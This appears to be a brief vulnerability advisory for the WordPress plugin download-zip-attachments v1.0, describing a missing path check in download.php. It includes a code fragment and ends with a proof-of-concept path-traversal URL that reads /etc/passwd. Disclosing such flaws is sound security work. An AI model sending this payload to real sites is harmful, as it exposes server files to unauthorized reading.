Title:Arbitrary file download vulnerability in download-zip-attachments v1.0
from download-zip-attachments/download.php makes no checks to verify the download path is with in the specified upload directory.

forceDownload($tmp_location,false);     
   unlink($tmp_location); 
   exit;
}http://www.example.com/wp-content/plugins/download-zip-attachments/download.php?File=../../../../../../../../etc/passwd